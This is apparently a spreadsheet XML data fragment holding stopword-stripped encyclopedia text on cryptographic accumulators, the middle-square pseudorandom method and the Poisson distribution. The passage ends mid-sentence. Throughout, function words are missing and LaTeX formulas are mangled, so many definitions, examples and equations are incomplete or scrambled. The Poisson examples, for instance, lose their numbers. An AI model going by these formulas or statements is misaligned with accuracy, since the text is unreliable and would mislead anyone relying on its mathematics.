exchange post-quantum cryptography lattice problem references</t>
  </si>
  <si>
    <t>Accumulator (cryptography)</t>
  </si>
  <si>
    <t>cryptography, accumulator membership hash function. allows users certify potential candidates member certain without revealing individual members set. this concept formally introduced josh benaloh michael mare 1993. formal definitions there several formal definitions proposed literature. this section lists proposer, roughly chronological order. benaloh mare (1993) benaloh mare define one-way hash function family functions {\displaystyle h_{\ell }:x_{\ell }\times y_{\ell }\to z_{\ell satisfy following three properties: {\displaystyle \ell \mathbb ,x\in x_{\ell },y\in y_{\ell compute {\displaystyle h_{\ell }(x,y)} time poly {\displaystyle {\text{poly}}(\ell ,|x|,|y|)} (here "poly" symbol refers unspecified, fixed, polynomial.) probabilistic polynomial-time algorithm will, sufficiently large {\displaystyle \ell inputs {\displaystyle \ell \mathbb ,(x,y)\in x_{\ell }\times y_{\ell },y'\in y_{\ell find value {\displaystyle x'\in x_{\ell {\displaystyle h_{\ell }(x,y)=h_{\ell }(x',y')} negligible probability. {\displaystyle \ell \mathbb ,x\in x_{\ell },y_{1},y_{2}\in y_{\ell {\displaystyle h(h(x,y_{1}),y_{2})=h(h(x,y_{2}),y_{1})} function satisfies property called quasi-commutative.)(with first properties, recovers normal definition cryptographic hash function.) from function, defines "accumulated hash" {\displaystyle \{y_{1},\dots ,y_{m}\}} starting value {\displaystyle w.r.t. value {\displaystyle {\displaystyle h(h(\cdots h(h(x,y_{1}),y_{2}),\dots ,y_{m-1}),y_{m})} result, depend order elements {\displaystyle y_{1},y_{2},...,y_{n}} {\displaystyle quasi-commutative.if {\displaystyle y_{1},y_{2},...,y_{n}} belong users cryptosystem, everyone compute accumulated value {\displaystyle also, user {\displaystyle y_{i}} compute partial accumulated value {\displaystyle z_{i}} {\displaystyle (y_{1},...,y_{i-1},y_{i+1},...,y_{n})} then, {\displaystyle h(z_{i},y_{i})=z.} {\displaystyle user provide pair {\displaystyle (z_{i},y_{i})} part, order authenticate {\displaystyle y_{i}} barić pfitzmann (1997) basic functionality quasi-commutative hash function immediate definition. this, barić pfitzmann defined slightly general definition, notion accumulator scheme consisting following components: gen: probabilistic algorithm takes parameters {\displaystyle \lambda (the security parameter number values securely accumulated, respectively), returns appropriate {\displaystyle eval: probabilistic algorithm takes {\displaystyle accumulation {\displaystyle y:=\{y_{1},\dots ,y_{n'}\}} {\displaystyle n'\leq returning accumulated value {\displaystyle auxiliary information {\displaystyle aux} insist eval must deterministic {\displaystyle wit: probabilistic algorithm takes {\displaystyle value {\displaystyle accumulated value {\displaystyle {\displaystyle auxiliary information {\displaystyle aux} returns either witness {\displaystyle special symbol {\displaystyle \bot insist that, {\displaystyle y\in returns witness, otherwise returns {\displaystyle \bot ver: deterministic algorithm takes {\displaystyle value {\displaystyle witness {\displaystyle accumulated value {\displaystyle returns yes/no value. insist {\displaystyle generated running tuple {\displaystyle (k,y,z,aux)} {\displaystyle z,aux} generated running eval {\displaystyle k,l} {\displaystyle chosen arbitrarily {\displaystyle chosen running gen, always return yes.it relatively easy define accumulator scheme quasi-commutative hash function, using technique shown above. camenisch lysyanskaya (2002) observes that, many applications, accumulated values change many times. naïvely, could completely redo accumulator calculation every time; however, inefficient, especially large change small. formalize intuition, camenish lysyanskaya defined dynamic accumulator scheme consist components ordinary accumulator scheme, plus three more: add: (possibly probabilistic) algorithm takes {\displaystyle accumulated value {\displaystyle another value accumulate {\displaystyle returns accumulated value {\displaystyle auxiliary information {\displaystyle aux} insist {\displaystyle generated accumulating {\displaystyle {\displaystyle must generated accumulating {\displaystyle l\cup \{y\}} del: (possibly probabilistic) algorithm takes {\displaystyle accumulated value {\displaystyle another value accumulate {\displaystyle returns accumulated value {\displaystyle auxiliary information {\displaystyle aux} insist {\displaystyle generated accumulating {\displaystyle {\displaystyle must generated accumulating {\displaystyle l\backslash \{y\}} upd: deterministic algorithm takes {\displaystyle value {\displaystyle witness {\displaystyle accumulated value {\displaystyle auxiliary information {\displaystyle aux} returns witness {\displaystyle insist {\displaystyle generated gen, {\displaystyle part {\displaystyle {\displaystyle witness {\displaystyle member {\displaystyle {\displaystyle accumulated value {\displaystyle {\displaystyle aux} generated running del, {\displaystyle witness {\displaystyle member set.fazio nicolosi note since add, del, simulated rerunning eval wit, definition fundamentally functionality. examples example multiplication large prime numbers. this cryptographic accumulator, since takes superpolynomial time factor composite number least according conjecture), takes small amount time (polynomial size) divide prime integer check factors and/or factor out. members added subtracted factors multiplying factoring number respectively. system, accumulators accumulated single shared prime trivially discovered calculating gcd, even without prior knowledge prime (which would otherwise require prime factorization accumulator discover).more practical accumulators quasi-commutative hash function, size accumulator grow number members. example, benaloh mare propose cryptographic accumulator inspired rsa: quasi-commutative function {\displaystyle h(x,y):=x^{y}{\pmod {n}}} composite number {\displaystyle they recommend choose {\displaystyle rigid integer (i.e. product safe primes). barić pfitzmann proposed variant {\displaystyle restricted prime {\displaystyle n/4} (this constant close {\displaystyle \phi (n)} leak information prime factorization {\displaystyle ).david naccache observed 1993 {\displaystyle e_{n,c}(x,y):=x^{y}c^{y-1}{\pmod {n}}} quasi-commutative constants {\displaystyle c,n} generalizing previous rsa-inspired cryptographic accumulator. naccache also noted dickson polynomials quasi-commutative degree, unknown whether family functions one-way.in 1996, nyberg constructed accumulator provably information-theoretically secure random oracle model. choosing upper limit {\displaystyle n=2^{d}} number items securely accumulated {\displaystyle \lambda security parameter, define constant {\displaystyle \ell :\approx {\frac {e}{\log _{2}(e)}}\lambda n\log _{2}(n)} integer multiple {\displaystyle write {\displaystyle \ell =rd} {\displaystyle h:\{0,1\}^{*}\to \{0,1\}^{\ell cryptographically secure hash function. choose {\displaystyle random {\displaystyle -bit bitstring. then, accumulate using nyberg's scheme, quasi-commutative hash function {\displaystyle h(x,y):=x\odot \alpha _{r}(h(y))} {\displaystyle \odot bitwise operation {\displaystyle \alpha _{r}:\{0,1\}^{\ell }\to \{0,1\}^{r}} function interprets input sequence {\displaystyle -bit bitstrings length {\displaystyle replaces every all-zero bitstring single every bitstring outputs result. applications haber stornetta showed 1990 accumulators used timestamp documents cryptographic chaining. (this concept anticipates modern notion cryptographic blockchain.) benaloh mare proposed alternative scheme 1991 based discretizing time rounds.benaloh mare showed accumulators used large group people recognize later time (which fazio nicolosi call escrow" situation). each person selects {\displaystyle representing identity, group collectively selects public accumulator {\displaystyle secret {\displaystyle then, group publishes saves hash function accumulated hash group's identities w.r.t secret {\displaystyle public accumulator; simultaneously, member group keeps identity value {\displaystyle accumulated hash group's identities except member. large group people trust other, accumulator cryptographic trapdoor case rsa-inspired accumulator, compute accumulated hashes secure multiparty computation.) verify claimed member indeed belong group later, present identity personal accumulated hash zero-knowledge proof thereof); accumulating identity claimed member checking accumulated hash entire group, anyone verify member group. with dynamic accumulator scheme, additionally easy remove members afterward.cryptographic accumulators also used construct cryptographically secure data structures: barić pfitzmann show construct fail-stop signatures constant space exploiting compression property. goodrich constructed size-oblivious, efficient, dynamic authenticated dictionary (which allows untrusted directories give cryptographically verifiable answers membership queries). papamanthou constructed cryptographically secure hash table, whose functionality authenticated stored remotely.the concept received renewed interest zerocoin bitcoin, employs cryptographic accumulators eliminate trackable linkage bitcoin blockchain, would make transactions anonymous private. more concretely, mint (create) zerocoin, publishes coin cryptographic commitment serial number secret random value (which users accept long correctly formatted); spend (reclaim) zerocoin, publishes zerocoin's serial number along non-interactive zero-knowledge proof know published commitment relates claimed serial number, claims coin (which users accept long nizkp valid serial number appeared before). since initial proposal zerocoin, succeeded zerocash protocol currently developed zcash, fully-fledged digital currency. also cryptography zero-knowledge proof references</t>
  </si>
  <si>
    <t>Middle-square method</t>
  </si>
  <si>
    <t>mathematics, middle-square method method generating pseudorandom numbers. practice good method, since period usually short severe weaknesses; repeated enough times, middle-square method either begin repeatedly generating number cycle previous number sequence loop indefinitely. history mathematics method invented john neumann, described conference 1949.in 1949 talk, neumann quipped "anyone considers arithmetical methods producing random digits course, state sin." what meant, elaborated, true "random numbers", means produce them, strict arithmetic procedure", like middle-square method, method". nevertheless, found methods hundreds times faster reading "truly" random numbers punch cards, practical importance eniac work. found "destruction" middle-square sequences factor favor, could easily detected: "one always fears appearance undetected short cycles". nicholas metropolis reported sequences 750,000 digits "destruction" means using 38-bit numbers "middle-square" method.the book broken dice ivar ekeland gives extended account method invented franciscan friar known brother edvin sometime 1240 1250. supposedly, manuscript lost, jorge luis borges sent ekeland copy made vatican library. modifying middle-square algorithm weyl sequence improves period randomness. method generate sequence n-digit pseudorandom numbers, n-digit starting value created squared, producing 2n-digit number. result fewer digits, leading zeroes added compensate. middle digits result would next number sequence returned result. this process repeated generate numbers. value must even order method work value odd, necessarily uniquely defined "middle n-digits" select from. consider following: 3-digit number squared, yield 6-digit number (e.g. 5402 291600). middle digits, would leave digits distributed left right middle. impossible evenly distribute digits equally sides middle number, therefore "middle digits". acceptable seeds zeros left order create even valued n-digit number (e.g. 0540). generator n-digit numbers, period longer middle digits zeroes, generator outputs zeroes forever. first half number sequence zeroes, subsequent numbers decreasing zero. while runs zero easy detect, occur frequently method practical use. middle-squared method also stuck number zero. occurs values 0100, 2500, 3792, 7600. other seed values form short repeating cycles, e.g., 0540 2916 5030 3009. these phenomena even obvious none possible seeds generates iterations without reverting loop. example implementation here, algorithm rendered python references also linear congruential generator blum blum shub</t>
  </si>
  <si>
    <t>Poisson random numbers</t>
  </si>
  <si>
    <t>probability theory statistics, poisson distribution discrete probability distribution expresses probability given number events occurring fixed interval time space events occur known constant mean rate independently time since last event. named french mathematician siméon denis poisson french pronunciation: ​[pwasɔ̃]). poisson distribution also used number events specified interval types distance, area volume. instance, call center receives average calls hour, hours day. calls independent; receiving change probability next arrive. number calls received minute poisson probability distribution mean likely numbers also likely small probability zero small probability could another example number decay events occur radioactive source defined observation period. history distribution first introduced siméon denis poisson (1781–1840) published together probability theory work recherches probabilité jugements matière criminelle matière civile (1837).: 205-207 work theorized number wrongful convictions given country focusing certain random variables count, among things, number discrete occurrences (sometimes called "events" "arrivals") take place time-interval given length. result already given 1711 abraham moivre mensura sortis seu; probabilitate eventuum ludis casu fortuito pendentibus 14-15 this makes example stigler's prompted authors argue poisson distribution bear name moivre.in 1860, simon newcomb fitted poisson distribution number stars found unit space. practical application distribution made ladislaus bortkiewicz 1898 given task investigating number soldiers prussian army killed accidentally horse kicks;: 23-25 experiment introduced poisson distribution field reliability engineering. definitions probability mass function discrete random variable said poisson distribution, parameter {\displaystyle \lambda probability mass function given by:: {\displaystyle \!f(k;\lambda )=\pr(x{=}k)={\frac {\lambda ^{k}e^{-\lambda }}{k!}},} number occurrences {\displaystyle k=0,1,2\dots euler's number 2.71828... {\displaystyle e=2.71828...} factorial function.the positive real number equal expected value also variance. {\displaystyle \lambda =\operatorname (x)=\operatorname {var} (x).} poisson distribution applied systems large number possible events, rare. number events occur fixed time interval right circumstances, random number poisson distribution. equation adapted instead average number events {\displaystyle \lambda given average rate {\displaystyle events occur. then {\displaystyle \lambda =rt} events interval {\displaystyle p(k{\text{ events interval }}t)={\frac {(rt)^{k}e^{-rt}}{k!}}.} example poisson distribution useful model events number meteorites greater meter diameter strike earth year; number patients arriving emergency room number laser photons hitting detector particular time interval. assumptions validity poisson distribution appropriate model following assumptions true: number times event occurs interval take values occurrence event affect probability second event occur. that events occur independently. average rate events occur independent occurrences. simplicity, usually assumed constant, practice vary time. events cannot occur exactly instant; instead, small sub-interval, either exactly event occurs, event occurs.if conditions true, poisson random variable, distribution poisson distribution. poisson distribution also limit binomial distribution, probability success trial equals divided number trials, number trials approaches infinity (see related distributions). examples probability poisson distributions once interval events: special case suppose astronomers estimate large meteorites (above certain size) earth average every years event years), number meteorite hits follows poisson distribution. what probability meteorite hits next years? meteorites next years 0.37 {\displaystyle p(k={\text{0 meteorites next years}})={\frac {1^{0}e^{-1}}{0!}}={\frac {1}{e}}\approx 0.37} under assumptions, probability large meteorites earth next years roughly 0.37. remaining 0.37 0.63 probability large meteorite hits next years. example above, overflow flood occurred every years probability overflow floods years roughly 0.37, calculation. general, event occurs average interval events follow poisson distribution, events next interval) 0.37. addition, p(exactly event next interval) 0.37, shown table overflow floods. examples violate poisson assumptions number students arrive student union minute likely follow poisson distribution, rate constant (low rate class time, high rate class times) arrivals individual students independent (students tend come groups). number magnitude earthquakes year country follow poisson distribution large earthquake increases probability aftershocks similar magnitude. examples least event guaranteed poisson distributed; modeled using zero-truncated poisson distribution. count distributions number intervals zero events higher predicted poisson model modeled using zero-inflated model. properties descriptive statistics expected value variance poisson-distributed random variable equal coefficient variation {\textstyle \lambda ^{-1/2}} index dispersion mean absolute deviation mean mode poisson-distributed random variable non-integer equal {\displaystyle \lfloor \lambda \rfloor largest integer less equal this also written floor(λ). when positive integer, modes cumulants poisson distribution equal expected value factorial moment poisson distribution expected value poisson process sometimes decomposed product intensity exposure generally expressed integral "intensity function" time space, sometimes described “exposure”). median bounds median {\displaystyle distribution known sharp: higher moments higher non-centered moments, poisson distribution, touchard polynomials {braces} denote stirling numbers second kind.: coefficients polynomials combinatorial meaning. fact, expected value poisson distribution dobinski's formula says moment equals number partitions size simple bound sums poisson-distributed random variables pois {\displaystyle x_{i}\sim \operatorname {pois} (\lambda _{i})} {\displaystyle i=1,\dotsc independent, pois {\textstyle \sum _{i=1}^{n}x_{i}\sim \operatorname {pois} \left(\sum _{i=1}^{n}\lambda _{i}\right).} converse raikov's theorem, says independent random variables poisson-distributed, independent random variables. other properties poisson distributions infinitely divisible probability distributions.: directed kullback–leibler divergence pois {\displaystyle \operatorname {pois} (\lambda _{0})} pois {\displaystyle \operatorname {pois} (\lambda given bounds tail probabilities poisson random variable pois {\displaystyle x\sim \operatorname {pois} (\lambda derived using chernoff bound argument.: 97-98 upper tail probability tightened factor least two) follows: {\displaystyle \operatorname _{\text{kl}}(x\mid \lambda directed kullback–leibler divergence, described above. inequalities relate distribution function poisson random variable pois {\displaystyle x\sim \operatorname {pois} (\lambda standard normal distribution function {\displaystyle \phi (x)} follows: {\displaystyle \operatorname _{\text{kl}}(k\mid \lambda directed kullback–leibler divergence. poisson races pois {\displaystyle x\sim \operatorname {pois} (\lambda pois {\displaystyle y\sim \operatorname {pois} (\mu independent random variables, {\displaystyle \lambda &lt;\mu upper bound proved using standard chernoff bound. lower bound proved noting {\displaystyle p(x-y\geq 0\mid x+y=i)} probability {\textstyle z\geq {\frac {i}{2}}} {\textstyle z\sim \operatorname {bin} \left(i,{\frac {\lambda }{\lambda +\mu }}\right)} bounded {\textstyle {\frac {1}{(i+1)^{2}}}e^{-id\left(0.5\|{\frac {\lambda }{\lambda +\mu }}\right)}} {\displaystyle relative entropy (see entry bounds tails binomial distributions details). further noting pois {\displaystyle x+y\sim \operatorname {pois} (\lambda +\mu computing lower bound unconditional probability gives result. more details found appendix kamath al.. related distributions general {\displaystyle x_{1}\sim \mathrm {pois} (\lambda _{1})\,} {\displaystyle x_{2}\sim \mathrm {pois} (\lambda _{2})\,} independent, difference {\displaystyle y=x_{1}-x_{2}} follows skellam distribution. {\displaystyle x_{1}\sim \mathrm {pois} (\lambda _{1})\,} {\displaystyle x_{2}\sim \mathrm {pois} (\lambda _{2})\,} independent, distribution {\displaystyle x_{1}} conditional {\displaystyle x_{1}+x_{2}} binomial distribution. specifically, {\displaystyle x_{1}+x_{2}=k} {\displaystyle \!x_{1}|x_{1}+x_{2}=k\sim \mathrm {binom} (k,\lambda _{1}/(\lambda _{1}+\lambda _{2}))} more generally, independent poisson random variables parameters given {\displaystyle \sum _{j=1}^{n}x_{j}=k,} follows {\displaystyle x_{i}{\big |}\sum _{j=1}^{n}x_{j}=k\sim \mathrm {binom} \left(k,{\frac {\lambda _{i}}{\sum _{j=1}^{n}\lambda _{j}}}\right)} fact, {\displaystyle \{x_{i}\}\sim \mathrm {multinom} \left(k,\left\{{\frac {\lambda _{i}}{\sum _{j=1}^{n}\lambda _{j}}}\right\}\right)} {\displaystyle x\sim \mathrm {pois} (\lambda )\,} distribution {\displaystyle conditional binomial distribution, {\displaystyle y\mid (x=k)\sim \mathrm {binom} (k,p)} distribution follows poisson distribution {\displaystyle y\sim \mathrm {pois} (\lambda \cdot p)\,} fact, {\displaystyle \{y_{i}\}} conditional follows multinomial distribution, {\displaystyle \{y_{i}\}\mid (x=k)\sim \mathrm {multinom} \left(k,p_{i}\right)} {\displaystyle y_{i}} follows independent poisson distribution {\displaystyle y_{i}\sim \mathrm {pois} (\lambda \cdot p_{i}),\rho (y_{i},y_{j})=0} poisson distribution derived limiting case binomial distribution number trials goes infinity expected number successes remains fixed rare events below. therefore, used approximation binomial distribution sufficiently large sufficiently small. there rule thumb stating poisson distribution good approximation binomial distribution least smaller equal 0.05, excellent approximation poisson distribution special case discrete compound poisson distribution stuttering poisson distribution) parameter. discrete compound poisson distribution deduced limiting distribution univariate multinomial distribution. also special case compound poisson distribution. sufficiently large values (say λ&gt;1000), normal distribution mean variance (standard deviation {\displaystyle {\sqrt {\lambda excellent approximation poisson distribution. greater normal distribution good approximation appropriate continuity correction performed, i.e., non-negative integer, replaced 0.5). variance-stabilizing transformation: {\displaystyle x\sim \mathrm {pois} (\lambda )\,} then: and: under transformation, convergence normality {\displaystyle \lambda increases) faster untransformed variable. other, slightly complicated, variance stabilizing transformations available,: anscombe transform. data transformation (statistics) general uses transformations. every number arrivals time interval follows poisson distribution mean sequence inter-arrival times independent identically distributed exponential random variables mean 1/λ.: 317–319 cumulative distribution functions poisson chi-squared distributions related following ways:: and: poisson approximation assume pois pois pois {\displaystyle x_{1}\sim \operatorname {pois} (\lambda _{1}),x_{2}\sim \operatorname {pois} (\lambda _{2}),\dots ,x_{n}\sim \operatorname {pois} (\lambda _{n})} {\displaystyle \lambda _{1}+\lambda _{2}+\dots +\lambda _{n}=1} {\displaystyle (x_{1},x_{2},\dots ,x_{n})} multinomially distributed mult {\displaystyle (x_{1},x_{2},\dots ,x_{n})\sim \operatorname {mult} (n,\lambda _{1},\lambda _{2},\dots ,\lambda _{n})} conditioned {\displaystyle n=x_{1}+x_{2}+\dots x_{n}} this means: 101-102 among things, nonnegative function {\displaystyle f(x_{1},x_{2},\dots ,x_{n})} mult {\displaystyle (y_{1},y_{2},\dots ,y_{n})\sim \operatorname {mult} (m,\mathbf multinomially distributed, pois {\displaystyle (x_{1},x_{2},\dots ,x_{n})\sim \operatorname {pois} (\mathbf factor {\displaystyle e{\sqrt {m}}} replaced {\displaystyle assumed monotonically increasing decreasing. bivariate poisson distribution this distribution extended bivariate case. generating function distribution marginal distributions poisson(θ1) poisson(θ2) correlation coefficient limited range simple generate bivariate poisson distribution {\displaystyle x_{1},x_{2}} take three independent poisson distributions {\displaystyle y_{1},y_{2},y_{3}} means {\displaystyle \lambda _{1},\lambda _{2},\lambda _{3}} {\displaystyle x_{1}=y_{1}+y_{3},x_{2}=y_{2}+y_{3}} probability function bivariate poisson distribution free poisson distribution free poisson distribution jump size {\displaystyle \alpha rate {\displaystyle \lambda arises free probability theory limit repeated free convolution words, {\displaystyle x_{n}} random variables {\displaystyle x_{n}} value {\displaystyle \alpha probability {\textstyle {\frac {\lambda }{n}}} value remaining probability. assume also family {\displaystyle x_{1},x_{2},\ldots freely independent. then limit {\displaystyle n\to \infty {\displaystyle x_{1}+\cdots +x_{n}} given free poisson parameters {\displaystyle \lambda ,\alpha this definition analogous ways classical poisson distribution obtained (classical) poisson process. measure associated free poisson given support {\displaystyle [\alpha (1-{\sqrt {\lambda }})^{2},\alpha (1+{\sqrt {\lambda }})^{2}]} this also arises random matrix theory marchenko–pastur law. free cumulants equal {\displaystyle \kappa _{n}=\lambda \alpha ^{n}} some transforms give values important transforms free poisson law; computation found e.g. book lectures combinatorics free probability nica speicherthe r-transform free poisson given cauchy transform (which negative stieltjes transformation) given s-transform given case {\displaystyle \alpha weibull stable count poisson's probability mass function {\displaystyle f(k;\lambda expressed form similar product distribution weibull distribution variant form stable count distribution. variable {\displaystyle (k+1)} regarded inverse lévy's stability parameter stable count distribution: {\displaystyle {\mathfrak {n}}_{\alpha }(\nu standard stable count distribution shape {\displaystyle \alpha =1/\left(k+1\right)} {\displaystyle w_{k+1}(x)} standard weibull distribution shape {\displaystyle k+1} statistical inference parameter estimation given sample measured values {\displaystyle k_{i}\in \{0,1,\dots wish estimate value parameter poisson population sample drawn. maximum likelihood estimate {\displaystyle {\widehat {\lambda }}_{\mathrm {mle} }={\frac {1}{n}}\sum _{i=1}^{n}k_{i}.} since observation expectation sample mean. therefore, maximum likelihood estimate unbiased estimator also efficient estimator since variance achieves cramér–rao lower bound (crlb). hence minimum-variance unbiased. also proven (and hence sample mean one-to-one function sum) complete sufficient statistic prove sufficiency factorization theorem. consider partitioning probability mass function joint poisson distribution sample parts: depends solely sample {\displaystyle \mathbf (called {\displaystyle h(\mathbf depends parameter {\displaystyle \lambda sample {\displaystyle \mathbf function {\displaystyle t(\mathbf then {\displaystyle t(\mathbf sufficient statistic {\displaystyle \lambda {\displaystyle p(\mathbf )=\prod _{i=1}^{n}{\frac {\lambda ^{x_{i}}e^{-\lambda }}{x_{i}!}}={\frac {1}{\prod _{i=1}^{n}x_{i}!}}\times \lambda ^{\sum _{i=1}^{n}x_{i}}e^{-n\lambda first term, {\displaystyle h(\mathbf depends {\displaystyle \mathbf second term, {\displaystyle g(t(\mathbf )|\lambda depends sample {\textstyle t(\mathbf )=\sum _{i=1}^{n}x_{i}} thus, {\displaystyle t(\mathbf sufficient. find parameter maximizes probability function poisson population, logarithm likelihood function: {\displaystyle {\begin{aligned}\ell (\lambda )&amp;=\ln \prod _{i=1}^{n}f(k_{i}\mid \lambda )\\&amp;=\sum _{i=1}^{n}\ln \!\left({\frac {e^{-\lambda }\lambda ^{k_{i}}}{k_{i}!}}\right)\\&amp;=-n\lambda +\left(\sum _{i=1}^{n}k_{i}\right)\ln(\lambda )-\sum _{i=1}^{n}\ln(k_{i}!).\end{aligned}}} take derivative {\displaystyle \ell respect compare zero: {\displaystyle {\frac {\mathrm }{\mathrm \lambda }}\ell (\lambda )=0\iff -n+\left(\sum _{i=1}^{n}k_{i}\right){\frac {1}{\lambda }}=0.\!} solving gives stationary point. {\displaystyle \lambda ={\frac {\sum _{i=1}^{n}k_{i}}{n}}} average values. obtaining sign second derivative stationary point determine kind extreme value {\displaystyle {\frac {\partial ^{2}\ell }{\partial \lambda ^{2}}}=-\lambda ^{-2}\sum _{i=1}^{n}k_{i}} evaluating second derivative stationary point gives: {\displaystyle {\frac {\partial ^{2}\ell }{\partial \lambda ^{2}}}=-{\frac {n^{2}}{\sum _{i=1}^{n}k_{i}}}} negative times reciprocal average this expression negative average positive. satisfied, stationary point maximizes probability function. completeness, family distributions said complete {\displaystyle e(g(t))=0} implies {\displaystyle p_{\lambda }(g(t)=0)=1} {\displaystyle \lambda individual {\displaystyle x_{i}} {\displaystyle \mathrm {po} (\lambda {\textstyle t(\mathbf )=\sum _{i=1}^{n}x_{i}\sim \mathrm {po} (n\lambda knowing distribution want investigate, easy statistic complete. {\displaystyle e(g(t))=\sum _{t=0}^{\infty }g(t){\frac {(n\lambda )^{t}e^{-n\lambda }}{t!}}=0} equality hold, {\displaystyle g(t)} must this follows fact none terms {\displaystyle possible values {\displaystyle \lambda hence, {\displaystyle e(g(t))=0} {\displaystyle \lambda implies {\displaystyle p_{\lambda }(g(t)=0)=1} statistic shown complete. confidence interval confidence interval mean poisson distribution expressed using relationship cumulative distribution functions poisson chi-squared distributions. chi-squared distribution closely related gamma distribution, leads alternative expression. given observation poisson distribution mean confidence interval confidence level {\displaystyle {\tfrac {1}{2}}\chi ^{2}(\alpha /2;2k)\leq \leq {\tfrac {1}{2}}\chi ^{2}(1-\alpha /2;2k+2),} equivalently, {\displaystyle f^{-1}(\alpha /2;k,1)\leq \leq f^{-1}(1-\alpha /2;k+1,1),} {\displaystyle \chi ^{2}(p;n)} quantile function (corresponding lower tail area chi-squared distribution degrees freedom {\displaystyle f^{-1}(p;n,1)} quantile function gamma distribution shape parameter scale parameter 176-178 this interval 'exact' sense coverage probability never less nominal when quantiles gamma distribution available, accurate approximation exact interval proposed (based wilson–hilferty transformation): {\displaystyle k\left(1-{\frac {1}{9k}}-{\frac {z_{\alpha /2}}{3{\sqrt {k}}}}\right)^{3}\leq \leq (k+1)\left(1-{\frac {1}{9(k+1)}}+{\frac {z_{\alpha /2}}{3{\sqrt {k+1}}}}\right)^{3},} {\displaystyle z_{\alpha /2}} denotes standard normal deviate upper tail area application formulae context (given sample measured values drawn poisson distribution mean would {\displaystyle k=\sum _{i=1}^{n}k_{i},} calculate interval derive interval bayesian inference bayesian inference, conjugate prior rate parameter poisson distribution gamma distribution. {\displaystyle \lambda \sim \mathrm {gamma} (\alpha ,\beta denote distributed according gamma density parameterized terms shape parameter inverse scale parameter {\displaystyle g(\lambda \mid \alpha ,\beta )={\frac {\beta ^{\alpha }}{\gamma (\alpha )}}\;\lambda ^{\alpha -1}\;e^{-\beta \,\lambda }\qquad {\text{ }}\lambda &gt;0\,\!.} then, given sample measured values before, prior gamma(α, posterior distribution {\displaystyle \lambda \sim \mathrm {gamma} \left(\alpha +\sum _{i=1}^{n}k_{i},\beta +n\right).\!} note posterior mean linear given {\displaystyle e[\lambda |k_{1},...k_{n}]={\frac {\alpha +\sum _{i=1}^{n}k_{i}}{\beta +n}}.\!} show gamma distribution prior induces linearity conditional mean. moreover, converse result exists states conditional mean close linear function {\displaystyle l_{2}} distance prior distribution must close gamma distribution levy distance.the posterior mean e[λ] approaches maximum likelihood estimate {\displaystyle {\widehat {\lambda }}_{\mathrm {mle} limit {\displaystyle \alpha \beta follows immediately general expression mean gamma distribution. posterior predictive distribution single additional observation negative binomial distribution,: sometimes called gamma–poisson distribution. simultaneous estimation multiple poisson means suppose {\displaystyle x_{1},x_{2},\dots ,x_{p}} independent random variables {\displaystyle poisson distributions, parameter {\displaystyle \lambda _{i}} {\displaystyle i=1,\dots would like estimate parameters. then, clevenson zidek show normalized squared error loss {\textstyle l(\lambda ,{\hat {\lambda }})=\sum _{i=1}^{p}\lambda _{i}^{-1}({\hat {\lambda }}_{i}-\lambda _{i})^{2}} {\displaystyle p&gt;1} then, similar stein's example normal means, estimator {\displaystyle {\hat {\lambda }}_{i}=x_{i}} inadmissible. case, family minimax estimators given {\displaystyle 0&lt;c\leq 2(p-1)} {\displaystyle b\geq (p-2+p^{-1})} {\displaystyle {\hat {\lambda }}_{i}=\left(1-{\frac {c}{b+\sum _{i=1}^{p}x_{i}}}\right)x_{i},\qquad i=1,\dots ,p.} occurrence applications applications poisson distribution found many fields including: count data general telecommunication example: telephone calls arriving system. astronomy example: photons arriving telescope. chemistry example: molar mass distribution living polymerization. biology example: number mutations strand unit length. management example: customers arriving counter call centre. finance insurance example: number losses claims occurring given period time. earthquake seismology example: asymptotic poisson model seismic risk large earthquakes. radioactivity example: number decays given time interval radioactive sample. optics example: number photons emitted single laser pulse. this major vulnerability quantum distribution protocols known photon number splitting (pns).the poisson distribution arises connection poisson processes. applies various phenomena discrete properties (that happen times given period time given area) whenever probability phenomenon happening constant time space. examples events modelled poisson distribution include: number soldiers killed horse-kicks year corps prussian cavalry. this example used book ladislaus bortkiewicz (1868–1931).: 23-25 number yeast cells used brewing guinness beer. this example used william sealy gosset (1876–1937). number phone calls arriving call centre within minute. this example described a.k. erlang (1878–1929). internet traffic. number goals sports involving competing teams. number deaths year given group. number jumps stock price given time interval. under assumption homogeneity, number times server accessed minute. number mutations given stretch certain amount radiation. proportion cells infected given multiplicity infection. number bacteria certain amount liquid. arrival photons pixel circuit given illumination given time period. targeting flying bombs london world investigated clarke 1946.gallagher showed 1976 counts prime numbers short intervals obey poisson distribution provided certain version unproved prime r-tuple conjecture hardy-littlewood true. rare events rate event related probability event occurring small subinterval time, space otherwise). case poisson distribution, assumes exists small enough subinterval probability event occurring twice "negligible". with assumption derive poisson distribution binomial one, given information expected number total events whole interval. total number events whole interval denoted {\displaystyle \lambda divide whole interval {\displaystyle subintervals {\displaystyle i_{1},\dots ,i_{n}} equal size, {\displaystyle n&gt;\lambda (since interested small portions interval assumption meaningful). this means expected number events subintervals equal {\displaystyle \lambda assume occurrence event whole interval seen sequence bernoulli trials, {\displaystyle bernoulli trial corresponds looking whether event happens subinterval {\displaystyle i_{i}} probability {\displaystyle \lambda expected number total events {\displaystyle trials would {\displaystyle \lambda expected number total events whole interval. hence subdivision interval approximated occurrence event bernoulli process form {\displaystyle {\textrm {b}}(n,\lambda /n)} noted want consider small subintervals. therefore, take limit {\displaystyle goes infinity. case binomial distribution converges known poisson distribution poisson limit theorem. several examples number mutations given sequence dna—the events counted actually outcomes discrete trials, would precisely modelled using binomial distribution, cases large small (and expectation intermediate magnitude). then distribution approximated less cumbersome poisson distribution this approximation sometimes known rare events,: since individual bernoulli events rarely occurs. name "law rare events" misleading total count success events poisson process need rare parameter small. example, number telephone calls busy switchboard hour follows poisson distribution events appearing frequent operator, rare point view average member population unlikely make call switchboard hour. variance binomial distribution times poisson distribution, almost equal small. word sometimes used synonym probability distribution, convergence means convergence distribution. accordingly, poisson distribution sometimes called "law small numbers" probability distribution number occurrences event happens rarely many opportunities happen. small numbers book ladislaus bortkiewicz poisson distribution, published 1898. poisson point process poisson distribution arises number points poisson point process located finite region. more specifically, region space, example euclidean space |d|, area, volume generally, lebesgue measure region finite, n(d) denotes number points {\displaystyle p(n(d)=k)={\frac {(\lambda |d|)^{k}e^{-\lambda |d|}}{k!}}.} poisson regression negative binomial regression poisson regression negative binomial regression useful analyses dependent (response) variable count number events occurrences interval. other applications science poisson process, number observed occurrences fluctuates mean standard deviation {\displaystyle \sigma _{k}={\sqrt {\lambda these fluctuations denoted poisson noise (particularly electronics) shot noise. correlation mean standard deviation counting independent discrete occurrences useful scientifically. monitoring fluctuations vary mean signal, estimate 